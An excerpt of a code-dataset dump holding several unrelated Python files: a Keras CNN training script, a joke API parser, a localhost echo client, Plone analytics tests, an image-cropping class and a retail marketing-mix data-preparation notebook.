str(process.pid)\nprint(p)\n","repo_name":"ArtemShendyapin/sdn_mininet","sub_path":"sdn_testbed/communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14259021474","text":"'''Train a simple deep CNN on the polygonal annotated slides using OpenSlideGenerator.\n'''\n\nfrom __future__ import print_function\nfrom matplotlib import cm\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nimport tensorflow.keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Activation, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras.optimizers import RMSprop\nimport os\nimport math\nimport time\nfrom datetime import datetime\nimport openslide_generator\n\ndef plot_loss_history(training_history, logscale=False):\n loss = training_history['loss']\n val_loss = training_history['val_loss']\n epochs = range(1, len(loss) + 1)\n plt.plot(epochs, loss, color='red', label='Training loss')\n plt.plot(epochs, val_loss, color='green', label='Validation loss')\n plt.title('Training and validation loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n if logscale:\n plt.yscale('log')\n plt.show()\n\n \ndef plot_accuracy_history(training_history):\n acc = training_history['accuracy']\n val_acc = training_history['val_accuracy']\n epochs = range(1, len(acc) + 1)\n plt.plot(epochs, acc, color='red', label='Training acc')\n plt.plot(epochs, val_acc, color='green', label='Validation acc')\n plt.title('Training and validation accuracy')\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n plt.show()\n\n\n\n\nprint(\"Definition generator\")\n# create generator instance\ngen_train = openslide_generator.OpenSlideGenerator('C:/Users/arno/Documents/fourthbrain/capstone/data/labels/labels_train.txt', \\\n 'C:/Users/arno/Documents/fourthbrain/capstone/data/training/', 512, 256, fetch_mode='label-slide', label_to_use=0)\n\nprint(\"gen_train defined\")\n\ngen_val = openslide_generator.OpenSlideGenerator('C:/Users/arno/Documents/fourthbrain/capstone/data/labels/labels_val.txt', \\\n 'C:/Users/arno/Documents/fourthbrain/capstone/data/training/', 512, 256, fetch_mode='label-slide', label_to_use=0)\n\nprint(\"gen_val defined\")\n\nprint(f'fetch_mode: {gen_train.fetch_mode}')\n\nbatch_size = 100\nnum_classes = len(gen_train.labels[gen_train.label_to_use])\nepochs = 1\ndata_augmentation = False\nnum_predictions = 20\nsave_dir = os.path.join(os.getcwd(), 'saved_models')\nmodel_name = 'keras_openslide_trained_model.h5'\nt_steps = math.ceil(gen_train.patch_per_epoch/batch_size)\nv_steps = math.ceil(gen_val.patch_per_epoch/batch_size)\n\n#print(f'gen_train.label_to_use: {gen_train.label_to_use}')\n#print(f'gen_train.labels[gen_train.label_to_use]: {gen_train.labels[gen_train.label_to_use]}')\n#print(f'gen_train.labels: {gen_train.labels}')\n\nprint(f't_steps: {t_steps}')\nprint(f'v_steps: {v_steps}')\nprint(f'num_classes: {num_classes}')\n\n# model construction\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), padding='same',\n input_shape=gen_train.shape()))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(64, (3, 3), padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes))\nmodel.add(Activation('softmax'))\n\n# initiate RMSprop optimizer\nopt = RMSprop(learning_rate=0.0001, decay=1e-6)\n\n# Let's train the model using RMSprop\nmodel.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'])\n\nprint(\"model compile successful\")\n# Fit the model on the batches generated by datagen.flow().\ntraining_history = model.fit(gen_train.flow(batch_size=batch_size),\nsteps_per_epoch=t_steps, \nepochs=epochs, \nvalidation_data=gen_val.flow(batch_size=batch_size),\nvalidation_steps=v_steps,\nworkers=4,\nuse_multiprocessing=True,\nverbose=1)\n\nnow = datetime.now()\nmodel.save('C:/Users/arno/Documents/fourthbrain/capstone/model/model_' + str(now.strftime(\"%Y%m%d_%H%M\")),save_format='tf')\nprint('Saved trained model')\n\nplot_accuracy_history(training_history.history)\nplot_loss_history(training_history.history)\nplot_loss_history(training_history.history, logscale=True)\n\n\n\n\n","repo_name":"roedersen/keras-OpenSlideGenerator","sub_path":"train_camelyon.py","file_name":"train_camelyon.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"38785037387","text":"''' This exercise will take the jokeAPI function from the last exercise \nand format the output in a way that is human-readable and easy to understand.'''\n\n# Import our JokeAPI function\nfrom easy import jokeAPI\n\n# This is our parseJson function. It takes ugly Json and pulls what we need from it. In this case: A funny programming Joke!\ndef parseJson():\n \n # Here I am assigning a variable to our jokeAPI function so I can call it easier.\n joke_Main = jokeAPI()\n \n # We then want to know what type of joke it will be. \n # We noticed that it can either be a \"single\" or \"twopart\" type of joke. \n # The JSON response will greatly differ based on what type of joke we recieve.\n joke_Type = joke_Main[\"type\"]\n\n # If joke_type is a \"twopart\": we will want two key values from the dictionary keys [\"setup\"] and [\"delivery\"].\n if joke_Type == \"twopart\":\n joke_key1 = joke_Main[\"setup\"]\n joke_key2 = joke_Main[\"delivery\"]\n return print(f'\\n{joke_key1} {joke_key2}\\n')\n \n # Else: we want the [\"joke\"] key value from a \"single\" joke_type.\n else:\n joke_Parse = joke_Main[\"joke\"]\n return print(f'\\n{joke_Parse}\\n')\n\n# Our main function is simple and acts a kickstart or more literally a script. It is the brain of your code.\ndef main():\n parseJson()\n\n# Code actually begins here! If the code is being called locally (not imported) it will run main().\nif __name__ == \"__main__\":\n main()\n","repo_name":"knappmi/Python__Projects","sub_path":"Get_API.py","file_name":"Get_API.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32507249887","text":"# echoclient.py\nfrom socket import socket, AF_INET, SOCK_STREAM\nfrom message import send_message, recv_message\n\ndef main(addr):\n sock = socket(AF_INET, SOCK_STREAM)\n sock.connect(addr)\n while True:\n msg = input(\"Say> \")\n if not msg:\n break\n send_message(sock, msg.encode('utf-8')) \n response = recv_message(sock)\n print(\"Received>\", response.decode('utf-8'))\n sock.close()\n \nmain(('localhost', 20_001))\n","repo_name":"AlexanderKosik/pyraft","sub_path":"experiments/dabeaz_raft/warumup/echoclient.py","file_name":"echoclient.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8356236034","text":"from collective.linguaanalytics.tests import base\nfrom collective.linguaanalytics.viewlets import analytics\nfrom zope.schema.interfaces import WrongContainedType\n\n\nclass IntegrationTestAnalyticsTrackingViewlet(base.IntegrationTestCase):\n \"\"\"unittest for the viewlet\"\"\"\n\n def setUp(self):\n super(IntegrationTestAnalyticsTrackingViewlet, self).setUp()\n init = analytics.AnalyticsTrackingViewlet\n self.request = self.layer['request']\n self.viewlet = init(self.portal, self.request, None, None)\n\n def test_init(self):\n init = analytics.AnalyticsTrackingViewlet\n viewlet = init(self.portal, self.request, None, None)\n self.assertTrue(hasattr(viewlet, '_settings'))\n self.assertTrue(hasattr(viewlet, '_code'))\n self.assertTrue(hasattr(viewlet, '_navigation_root_url'))\n\n def test_available(self):\n #no mapping\n self.assertTrue(not self.viewlet.available())\n\n #add working mapping\n self.viewlet.settings.mapping = ['http://nohost/plone|UA-xxxxxx-x']\n self.assertTrue(self.viewlet.available())\n\n #unactivate\n self.viewlet.settings.activated = False\n self.assertTrue(not self.viewlet.available())\n self.viewlet.settings.activated = True\n\n def test_getTrackingWebProperty(self):\n self.viewlet.settings.mapping = ['http://nohost/plone|UA-xxxxxx-x']\n code = self.viewlet.getTrackingWebProperty()\n self.assertTrue(code == \"UA-xxxxxx-x\")\n\n self.viewlet._code = \"Foo\"\n code = self.viewlet.getTrackingWebProperty()\n self.assertTrue(code == \"Foo\")\n self.viewlet._code = None\n\n #test bad url\n self.viewlet._navigation_root_url = 'http://notmapped/plone'\n code = self.viewlet.getTrackingWebProperty()\n self.assertTrue(code is None)\n\n def test_mapping(self):\n self.viewlet.settings.mapping = ['http://nohost|UA-xxxxxx-x',\n 'http://nohost.fr|UA-yyyyyy-y']\n self.assertRaises(WrongContainedType,\n self.viewlet.settings.__setattr__,\n 'mapping',\n [None])\n self.assertRaises(WrongContainedType,\n self.viewlet.settings.__setattr__,\n 'mapping',\n ['BAD'])\n mapping = self.viewlet.mapping\n self.assertTrue(mapping.get('http://nohost') == 'UA-xxxxxx-x')\n self.assertTrue(mapping.get('http://nohost.fr') == 'UA-yyyyyy-y')\n self.assertTrue(len(mapping) == 2)\n","repo_name":"toutpt/collective.linguaanalytics","sub_path":"collective/linguaanalytics/tests/test_integration_trackingviewlet.py","file_name":"test_integration_trackingviewlet.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35785695454","text":"class PairRandomCrop:\n image_crop_position = {}\n\n def __init__(self, size):\n import random\n import os\n import numbers\n\n from PIL import ImageOps\n\n self.os = os\n self.random = random\n self.ImageOps = ImageOps\n\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n\n def __call__(self, img):\n w, h = img.size\n th, tw = self.size\n if w == tw and h == th:\n return img\n\n pid = self.os.getpid()\n if pid in self.image_crop_position:\n x1, y1 = self.image_crop_position.pop(pid)\n else:\n x1 = self.random.randint(0, w - tw)\n y1 = self.random.randint(0, h - th)\n self.image_crop_position[pid] = (x1, y1)\n return img.crop((x1, y1, x1 + tw, y1 + th))\n","repo_name":"yippp/FSRCNN","sub_path":"dataset/PairRandomCrop.py","file_name":"PairRandomCrop.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"35314918554","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport pandas as pd\nimport json\nimport os\nimport datetime\nimport numpy as np\nimport glob\n\n# Email to be allocated from EE to DMA, not done yet\n\n\n# In[2]:\n\ntoday_str=str(datetime.datetime.now().date())\nwriter_folder=\"/home/jian/Projects/Big_Lots/TMR/To_Spencer/output/\"+today_str+\"/\"\ntry:\n os.stat(writer_folder)\nexcept:\n os.mkdir(writer_folder)\n\n\n# In[ ]:\n\n\n\n\n# In[3]:\n\nNational_TV_2017=pd.read_csv(\"/home/jian/Projects/Big_Lots/TMR/To_Spencer/finaltvlogs_0306.csv\",dtype=str)\n\nNational_TV_2017['impression']=National_TV_2017['Act Impression'].astype(float)\nNational_TV_2017['cost']=National_TV_2017['Net Cost'].astype(float)\nNational_TV_2017['week_start_date']=National_TV_2017['Week BL'].apply(lambda x: datetime.datetime.strptime(x,\"%m/%d/%y\").date())\nNational_TV_2017=National_TV_2017[National_TV_2017['week_start_date']<datetime.date(2017,12,30)]\nNational_TV_2017=National_TV_2017[National_TV_2017['week_start_date']>=datetime.date(2016,10,2)]\n\n\n# In[4]:\n\nNational_TV_2017=National_TV_2017[['week_start_date','cleaned DMA','Media Type','Network','impression','cost']]\nNational_TV_2017=National_TV_2017.groupby(['week_start_date','cleaned DMA','Media Type','Network'])['impression','cost'].sum().reset_index()\nNational_TV_2017=National_TV_2017.rename(columns={\"cleaned DMA\":\"cleaned dma\",\"Media Type\":\"submedia\",\"Network\":\"placement\"})\nNational_TV_2017['submedia']=National_TV_2017['submedia'].replace(['National Cable','DirecTV'],\"National\")\nNational_TV_2017['submedia']=National_TV_2017['submedia'].replace(['Spot Cable', 'Spot Broadcast', 'FOOTPRINT-SINCLAIR'],\"Local\")\nNational_TV_2017=National_TV_2017[National_TV_2017['submedia']==\"National\"]\n\n\n# In[5]:\n\nNational_TV_2017['impression'].sum()\n\n\n# In[6]:\n\ndata_Joann=pd.read_table(\"/home/jian/Projects/Big_Lots/TMR/To_Spencer/Up_to_2018Q2/BL ALL TMR 0926 updated.dat\",sep=\"\\t\",dtype=str)\ndata_Joann['week date']=data_Joann['week date'].apply(lambda x: datetime.datetime.strptime(x,\"%m/%d/%Y\").date())\n\n\n# In[7]:\n\ndata_Joann['impression']=data_Joann['impression'].astype(float)\ndata_Joann['click']=data_Joann['click'].astype(float)\ndata_Joann['cost']=data_Joann['cost'].astype(float)\n\n\n# In[8]:\n\n# Replace Q2 TV from Connor because of actualized spend\n\nnew_Q2_TV=pd.read_csv(\"/home/jian/Projects/Big_Lots/TMR/To_Spencer/Up_to_2018Q2/BigLots_Q2_TMR_TV_CC_20181016.csv\",dtype=str)\nnew_Q2_TV=new_Q2_TV[data_Joann.columns.tolist()]\nnew_Q2_TV['week date']=new_Q2_TV['week date'].apply(lambda x: datetime.datetime.strptime(x,\"%m/%d/%Y\").date())\nnew_Q2_TV['impression']=new_Q2_TV['impression'].astype(float)\nnew_Q2_TV['click']=new_Q2_TV['click'].astype(float)\nnew_Q2_TV['cost']=new_Q2_TV['cost'].astype(float)\n\ndata_Joann_Q2_TV=data_Joann[(data_Joann['media']==\"TV\") & (data_Joann['week date']>=datetime.date(2018,5,6)) & (data_Joann['week date']<=datetime.date(2018,8,4))]\ndata_Joann_others=data_Joann[(data_Joann['media']!=\"TV\") | (data_Joann['week date']<datetime.date(2018,5,6)) | (data_Joann['week date']>datetime.date(2018,8,4))]\n\ndata_Joann=data_Joann_others.append(new_Q2_TV)\n\n\n# In[9]:\n\n'''\ndate_range_func={\"week date\":['max','min'],\"impression\":\"sum\",\"click\":\"sum\",\"cost\":\"sum\"}\ndata_Joann.groupby(['media','submedia'])['week date','impression','click','cost'].agg(date_range_func).reset_index()\n'''\n\n\n# In[10]:\n\ndata_Joann=data_Joann[data_Joann['week date']<=datetime.date(2018,7,29)] # week start date\ndata_Joann=data_Joann[data_Joann['week date']>=datetime.date(2016,10,1)]\ndata_Joann['week date']=data_Joann['week date'].astype(str)\n\n\n# In[11]:\n\ndata_Joann.head(2)\n\n\n# In[15]:\n\nemail_all=data_Joann[data_Joann['media']==\"Email\"]\nnon_email_all=data_Joann[data_Joann['media']!=\"Email\"]\nemail_all['cost']=email_all['impression']*0.000455784518529597\ndata_Joann=email_all.append(non_email_all)\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n\n# In[16]:\n\ndata_media_national=data_Joann.groupby(['week date','media'])[['impression','click','cost']].sum().reset_index()\n\ndata_sub_media_national=data_Joann.groupby(['week date','media','submedia'])[['impression','click','cost']].sum().reset_index()\ndata_sub_media_national['submedia']=data_sub_media_national['media']+\"_\"+data_sub_media_national['submedia']\ndel data_sub_media_national['media']\n\n\n# In[17]:\n\ndata_sub_media_national['week_start_date']=data_sub_media_national['week date']\ndata_sub_media_national['week_start_date']=data_sub_media_national['week_start_date'].apply(lambda x: datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\ndata_sub_media_national_2018=data_sub_media_national[data_sub_media_national['week_start_date']>=datetime.date(2017,12,31)]\ndata_sub_media_national_2017=data_sub_media_national[data_sub_media_national['week_start_date']<datetime.date(2017,12,31)]\ndata_sub_media_national_2017_Non_NationalTV=data_sub_media_national_2017[data_sub_media_national_2017['submedia']!=\"TV_National\"]\ndata_sub_media_national_2017_NationalTV=data_sub_media_national_2017[data_sub_media_national_2017['submedia']==\"TV_National\"]\n\n\n# In[18]:\n\nNational_TV_2017['week date']=np.nan\nNational_TV_2017['click']=0\ndata_sub_media_national_2017_NationalTV=National_TV_2017[['week date','submedia','impression','click','cost','week_start_date']]\ndata_sub_media_national_2017_NationalTV['submedia']=\"TV_National\"\n\ndata_sub_media_national_2017_NationalTV['week date']=data_sub_media_national_2017_NationalTV['week_start_date'].astype(str)\ndata_sub_media_national_2017_NationalTV=data_sub_media_national_2017_NationalTV.groupby(['week date','submedia','week_start_date'])['impression','click','cost'].sum().reset_index()\n\n\n# In[19]:\n\ndata_sub_media_national=data_sub_media_national_2017_Non_NationalTV.append(data_sub_media_national_2017_NationalTV).append(data_sub_media_national_2018)\ndata_sub_media_national=data_sub_media_national.reset_index()\ndel data_sub_media_national['index']\n\n\n# In[20]:\n\ndata_sub_media_national_2017_NationalTV.head(2)\n\n\n# In[21]:\n\ndef pivot_level_media(level,df_input):\n df_impr=df_input[['week date',level,'impression']]\n df_impr=df_impr.pivot_table(index='week date',columns=level,values='impression').reset_index()\n for col in df_impr.columns.tolist()[1:]:\n df_impr=df_impr.rename(columns={col:col+\"_impr\"})\n \n df_click=df_input[['week date',level,'click']]\n df_click=df_click.pivot_table(index='week date',columns=level,values='click').reset_index()\n for col in df_click.columns.tolist()[1:]:\n df_click=df_click.rename(columns={col:col+\"_click\"})\n \n df_cost=df_input[['week date',level,'cost']]\n df_cost=df_cost.pivot_table(index='week date',columns=level,values='cost').reset_index()\n for col in df_cost.columns.tolist()[1:]:\n df_cost=df_cost.rename(columns={col:col+\"_cost\"})\n \n result=pd.merge(df_impr,df_click,on=\"week date\",how=\"outer\")\n result=pd.merge(result,df_cost,on=\"week date\",how=\"outer\")\n result=result.fillna(0)\n return result\n\n\n# In[22]:\n\ndata_media_national_wide=pivot_level_media('media',data_media_national)\ndata_submedia_national_wide=pivot_level_media('submedia',data_sub_media_national)\n\n\n# In[23]:\n\ndata_media_dma=data_Joann.groupby(['week date','media','cleaned dma'])[['impression','click','cost']].sum().reset_index()\ndata_media_dma=data_media_dma[data_media_dma['cleaned dma']!=\"National\"]\ndata_media_dma=data_media_dma[data_media_dma['cleaned dma']!=\"xx\"]\ndata_sub_media_dma=data_Joann.groupby(['week date','media','submedia','cleaned dma'])[['impression','click','cost']].sum().reset_index()\ndata_sub_media_dma['submedia']=data_sub_media_dma['media']+\"_\"+data_sub_media_dma['submedia']\ndel data_sub_media_dma['media']\ndata_sub_media_dma=data_sub_media_dma[data_sub_media_dma['cleaned dma']!=\"National\"]\ndata_sub_media_dma=data_sub_media_dma[data_sub_media_dma['cleaned dma']!=\"xx\"]\n\ndata_media_dma['week date']=data_media_dma['week date']+\"|\"+data_media_dma['cleaned dma']\ndel data_media_dma['cleaned dma']\n\ndata_sub_media_dma['week date']=data_sub_media_dma['week date']+\"|\"+data_sub_media_dma['cleaned dma']\ndel data_sub_media_dma['cleaned dma']\n\n\n# In[24]:\n\ndata_media_dma_wide=pivot_level_media('media',data_media_dma)\ndata_media_dma_wide['cleaned dma']=data_media_dma_wide['week date'].apply(lambda x: x.split(\"|\")[1])\ndata_media_dma_wide['week date']=data_media_dma_wide['week date'].apply(lambda x: x.split(\"|\")[0])\n\ndata_submedia_dma_wide=pivot_level_media('submedia',data_sub_media_dma)\ndata_submedia_dma_wide['cleaned dma']=data_submedia_dma_wide['week date'].apply(lambda x: x.split(\"|\")[1])\ndata_submedia_dma_wide['week date']=data_submedia_dma_wide['week date'].apply(lambda x: x.split(\"|\")[0])\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\ndata_media_national_wide['week date']=data_media_national_wide['week date'].apply(lambda x:datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\ndata_submedia_national_wide['week date']=data_submedia_national_wide['week date'].apply(lambda x:datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\n\ndata_media_dma_wide['week date']=data_media_dma_wide['week date'].apply(lambda x:datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\ndata_submedia_dma_wide['week date']=data_submedia_dma_wide['week date'].apply(lambda x:datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\n\n\n# # Sales & Transaction\n\n# In[ ]:\n\nfolder_file_pattern=glob.glob(\"/home/jian/Projects/Big_Lots/Sales_All/Sales_Data/*.txt\")\nsales_all=pd.DataFrame()\n\nfor file in folder_file_pattern:\n df=pd.read_csv(file,sep=\"|\",dtype=str,na_values=\"?\")\n\n if \"class_code_id\" in df.columns:\n try:\n df['week_end_dt']=df['week_end_dt'].apply(lambda x: datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\n \n except:\n print(file,\"Date Error\")\n\n \n else:\n print(file,\"Error: class_code_id not in columns\")\n \n sales_all=sales_all.append(df)\n \nsales_all['class_gross_sales_amt']=sales_all['class_gross_sales_amt'].astype(float)\nsales_all['class_gross_sales_amt']=sales_all['class_gross_sales_amt'].fillna(0.0)\nsales_all['subclass_gross_sales_amt']=sales_all['subclass_gross_sales_amt'].astype(float)\nsales_all['subclass_gross_sales_amt']=np.where(pd.isnull(sales_all['subclass_gross_sales_amt']),sales_all['class_gross_sales_amt'],sales_all['subclass_gross_sales_amt'])\n\ntrans_all=sales_all.copy()\nsales_all=sales_all[(sales_all['week_end_dt']<=datetime.date(2018,8,4)) & (sales_all['week_end_dt']>=datetime.date(2016,10,8))] \nsales_all=sales_all.drop_duplicates()\necommerce_sales=sales_all[sales_all['location_id']==\"6990\"]\nsales_all=sales_all[sales_all['location_id']!=\"6990\"]\nsales_all=sales_all[sales_all['location_id']!=\"145\"]\n\n\n# In[ ]:\n\ntrans_all=trans_all[['location_id','week_end_dt','gross_transaction_cnt']].drop_duplicates()\ntrans_all['gross_transaction_cnt']=trans_all['gross_transaction_cnt'].astype(int)\ntrans_all['week_end_dt']=trans_all['week_end_dt'].astype(str)\ntrans_all_0429=trans_all[trans_all['week_end_dt']==\"2017-04-29\"]\ntrans_all_0429['week_end_dt']=\"2017-05-06\"\ntrans_all_0429=trans_all_0429.rename(columns={\"gross_transaction_cnt\":\"0429\"})\n\ntrans_all_0513=trans_all[trans_all['week_end_dt']==\"2017-05-13\"]\ntrans_all_0513['week_end_dt']=\"2017-05-06\"\ntrans_all_0513=trans_all_0513.rename(columns={\"gross_transaction_cnt\":\"0513\"})\n\ntrans_all_0506=pd.merge(trans_all_0429,trans_all_0513,on=['location_id','week_end_dt'],how=\"outer\")\ntrans_all_0506=trans_all_0506.fillna(0)\ntrans_all_0506['gross_transaction_cnt']=(trans_all_0506['0429']+trans_all_0506['0513'])/2\ntrans_all_0506=trans_all_0506[['location_id','week_end_dt','gross_transaction_cnt']]\n\ntrans_all_exc=trans_all[trans_all['week_end_dt']!=\"2017-05-06\"]\ntrans_data=trans_all_exc.append(trans_all_0506)\ntrans_data=trans_data.sort_values(['location_id','week_end_dt'])\n# trans_data['week_end_dt']=trans_data['week_end_dt'].apply(lambda x: datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\n\necommerce_trans=trans_data[trans_data['location_id']==\"6990\"]\ntrans_data=trans_data[trans_data['location_id']!=\"6990\"]\ntrans_data=trans_data[trans_data['location_id']!=\"145\"]\n\n\n# In[ ]:\n\nstore_DMA=pd.read_excel(\"/home/jian/Projects/Big_Lots/Other_Input/all_store_DMA_20180726.xlsx\",dtype=str)\nstore_DMA=store_DMA[['location_id','cleaned_dma']].rename(columns={\"cleaned_dma\":\"cleaned dma\"})\n# dma_clean=pd.read_excel(\"/home/jian/Projects/Big_Lots/Other_Input/DMA cleaning.xlsx\",dtype=str)\n\n\n# In[ ]:\n\nsales_all_by_store=sales_all.groupby(['location_id','week_end_dt'])['subclass_gross_sales_amt'].sum().to_frame().reset_index()\nsales_all_by_store=pd.merge(sales_all_by_store,store_DMA,on=\"location_id\",how=\"left\")\ntrans_data['week_end_dt']=trans_data['week_end_dt'].apply(lambda x: datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\n\ntransaction_sales_data=pd.merge(sales_all_by_store,trans_data,on=['location_id','week_end_dt'],how=\"left\")\n\n\n# In[ ]:\n\ntransaction_sales_data['subclass_gross_sales_amt'].apply(lambda x: type(x)).unique()\n\n\n# In[ ]:\n\ntransaction_sales_data_dma=transaction_sales_data.groupby(['cleaned dma','week_end_dt'])[['subclass_gross_sales_amt','gross_transaction_cnt']].sum().reset_index()\n\ntransaction_sales_data_dma=transaction_sales_data_dma[(transaction_sales_data_dma['week_end_dt']>=datetime.date(2016,10,8)) & (transaction_sales_data_dma['week_end_dt']<=datetime.date(2018,8,4))]\ntransaction_sales_data_dma=transaction_sales_data_dma.rename(columns={\"subclass_gross_sales_amt\":\"sales\",'gross_transaction_cnt':\"trans\"})\ntransaction_sales_data_dma['week date']=transaction_sales_data_dma['week_end_dt'].apply(lambda x: x-datetime.timedelta(days=6))\n\ndel transaction_sales_data_dma['week_end_dt']\ntransaction_sales_data_national=transaction_sales_data_dma.groupby(['week date'])['sales','trans'].sum().reset_index()\n\n\n# In[ ]:\n\nstore_counts_dma=sales_all_by_store[sales_all_by_store['subclass_gross_sales_amt']>0]\nstore_counts_dma=store_counts_dma.groupby(['cleaned dma','week_end_dt'])['location_id'].count().to_frame().reset_index()\nstore_counts_dma=store_counts_dma.rename(columns={\"location_id\":\"store_count\"})\nstore_counts_dma['week date']=store_counts_dma['week_end_dt'].apply(lambda x: x-datetime.timedelta(days=6))\n\n\nstore_counts_national=store_counts_dma.groupby(['week_end_dt'])['store_count'].sum().to_frame().reset_index()\n\nstore_counts_dma['week date']=store_counts_dma['week_end_dt'].apply(lambda x: x-datetime.timedelta(days=6))\nstore_counts_national['week date']=store_counts_national['week_end_dt'].apply(lambda x: x-datetime.timedelta(days=6))\n\ndel store_counts_dma['week_end_dt']\ndel store_counts_national['week_end_dt']\n\n\n# In[ ]:\n\nMMM_national_media=pd.merge(data_media_national_wide,store_counts_national,on=\"week date\",how=\"left\")\nMMM_national_media=pd.merge(MMM_national_media,transaction_sales_data_national,on=\"week date\",how=\"left\")\n\nMMM_dma_media=pd.merge(data_media_dma_wide,store_counts_dma,on=[\"week date\",\"cleaned dma\"],how=\"left\")\nMMM_dma_media=pd.merge(MMM_dma_media,transaction_sales_data_dma,on=[\"week date\",\"cleaned dma\"],how=\"left\")\n\nMMM_national_sub_media=pd.merge(data_submedia_national_wide,store_counts_national,on=\"week date\",how=\"left\")\nMMM_national_sub_media=pd.merge(MMM_national_sub_media,transaction_sales_data_national,on=\"week date\",how=\"left\")\n\nMMM_dma_sub_media=pd.merge(data_submedia_dma_wide,store_counts_dma,on=[\"week date\",\"cleaned dma\"],how=\"left\")\nMMM_dma_sub_media=pd.merge(MMM_dma_sub_media,transaction_sales_data_dma,on=[\"week date\",\"cleaned dma\"],how=\"left\")\n\n\n# In[ ]:\n\nMMM_national_media=MMM_national_media.sort_values(['week date'])\nMMM_dma_media=MMM_dma_media.sort_values(['week date','cleaned dma'])\nMMM_national_sub_media=MMM_national_sub_media.sort_values(['week date'])\nMMM_dma_sub_media=MMM_dma_sub_media.sort_values(['week date','cleaned dma'])\n\ndef order_columns(df):\n iv_list=[col for col in df.columns.tolist() if \"_\" in col]\n dv_list=[col for col in df.columns.tolist() if \"_\" not in col]\n df=df[dv_list+iv_list]\n return df\nMMM_national_media=order_columns(MMM_national_media)\nMMM_dma_media=order_columns(MMM_dma_media)\nMMM_dma_media=MMM_dma_media[~pd.isnull(MMM_dma_media['sales'])]\nMMM_national_sub_media=order_columns(MMM_national_sub_media)\nMMM_dma_sub_media=order_columns(MMM_dma_sub_media)\nMMM_dma_sub_media=MMM_dma_sub_media[~pd.isnull(MMM_dma_sub_media['sales'])]\n\n'''\nMMM_national_media.to_csv(writer_folder+\"BL_MMM_national_media_JL_\"+today_str+\".csv\",index=False)\nMMM_dma_media.to_csv(writer_folder+\"BL_MMM_dma_media_JL_\"+today_str+\".csv\",index=False)\nMMM_national_sub_media.to_csv(writer_folder+\"BL_MMM_national_sub_media_JL_\"+today_str+\".csv\",index=False)\nMMM_dma_sub_media.to_csv(writer_folder+\"BL_MMM_dma_sub_media_JL_\"+today_str+\".csv\",index=False)\n'''\n\n\n# In[ ]:\n\necommerce_trans_by_week=ecommerce_trans[['week_end_dt','gross_transaction_cnt']].rename(columns={\"gross_transaction_cnt\":\"e_transaction\"})\necommerce_trans_by_week['week_end_dt']=ecommerce_trans_by_week['week_end_dt'].apply(lambda x: datetime.datetime.strptime(x,\"%Y-%m-%d\").date())\necommerce_trans_by_week['week date']=ecommerce_trans_by_week['week_end_dt'].apply(lambda x: x-datetime.timedelta(days=6))\necommerce_trans_by_week=ecommerce_trans_by_week[['week date','e_transaction']]\n\n\n\n# In[ ]:\n\necommerce_sales_by_week=ecommerce_sales.groupby(['week_end_dt'])['subclass_gross_sales_amt'].sum().to_frame().reset_index()\necommerce_sales_by_week=ecommerce_sales_by_week.rename(columns={\"subclass_gross_sales_amt\":\"e_sales\"})\necommerce_sales_by_week['week date']=ecommerce_sales_by_week['week_end_dt'].apply(lambda x: x-datetime.timedelta(days=6))\necommerce_sales_by_week=ecommerce_sales_by_week[['week date','e_sales']]\necommerce_sales_by_week.head(2)\n\n\n# In[ ]:\n\necommerce_trans_by_week.tail(2)\n\n\n# In[ ]:\n\nMMM_national_media=pd.merge(MMM_national_media,ecommerce_sales_by_week,on=\"week date\",how=\"left\")\nMMM_national_media=pd.merge(MMM_national_media,ecommerce_trans_by_week,on=\"week date\",how=\"left\")\n\nMMM_national_sub_media=pd.merge(MMM_national_sub_media,ecommerce_sales_by_week,on=\"week date\",how=\"left\")\nMMM_national_sub_media=pd.merge(MMM_national_sub_media,ecommerce_trans_by_week,on=\"week date\",how=\"left\")\n\n\n# In[ ]:\n\nBinary_List_1=[datetime.date(2016,12,18),datetime.date(2017,12,17)]\n\nBinary_List_2_16=[datetime.date(2016,11,20)+datetime.timedelta(days=x*7) for x in 